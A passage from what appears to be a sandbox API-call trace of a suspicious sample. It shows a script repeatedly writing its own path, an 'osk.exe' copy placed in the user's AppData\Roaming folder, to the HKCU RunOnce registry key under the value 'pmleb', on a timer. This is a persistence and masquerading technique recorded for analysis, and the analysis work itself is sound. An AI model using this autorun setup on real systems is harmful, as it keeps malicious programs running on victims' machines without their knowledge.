ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.971] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.971] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.971] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.971] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.971] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1d [0080.971] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.971] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1e [0080.971] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.972] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1d [0080.972] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.972] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.972] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0080.972] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.972] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.972] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.972] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.972] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.973] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.973] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.973] RegCloseKey (hKey=0x280) returned 0x0 [0080.973] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.973] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.973] SetTimer (hWnd=0x20280, nIDEvent=0x2099, uElapse=0xa, lpTimerFunc=0x0) returned 0x2099 [0080.973] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.048] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.048] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.049] KillTimer (hWnd=0x20280, uIDEvent=0x2099) returned 1 [0081.049] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.049] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.049] IUnknown:Release (This=0x787518) returned 0x1 [0081.049] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.049] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.049] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.050] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.050] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.050] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.050] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.050] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.050] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.050] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1e [0081.050] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.050] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1f [0081.050] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.051] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1e [0081.051] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.051] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.051] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.051] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.051] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 
0x0 [0081.051] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.052] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.052] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.052] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.052] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 
lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.052] RegCloseKey (hKey=0x280) returned 0x0 [0081.052] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.052] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.052] SetTimer (hWnd=0x20280, nIDEvent=0x209a, uElapse=0xa, lpTimerFunc=0x0) returned 0x209a [0081.053] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.063] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.063] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.063] KillTimer (hWnd=0x20280, uIDEvent=0x209a) returned 1 [0081.063] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.064] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.064] IUnknown:Release (This=0x787518) returned 0x1 [0081.064] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.064] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.064] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | 
out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.064] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.064] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.064] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.064] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.064] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.064] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 
ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.065] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1f [0081.065] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.065] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x20 [0081.065] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.066] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1f [0081.066] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.066] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.066] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.066] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.066] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.066] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.066] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.066] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.066] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") 
returned 0x0 [0081.067] RegCloseKey (hKey=0x280) returned 0x0 [0081.067] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.067] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.067] SetTimer (hWnd=0x20280, nIDEvent=0x209b, uElapse=0xa, lpTimerFunc=0x0) returned 0x209b [0081.067] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.079] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.079] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.079] KillTimer (hWnd=0x20280, uIDEvent=0x209b) returned 1 [0081.079] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.079] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.079] IUnknown:Release (This=0x787518) returned 0x1 [0081.079] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.080] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.080] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), 
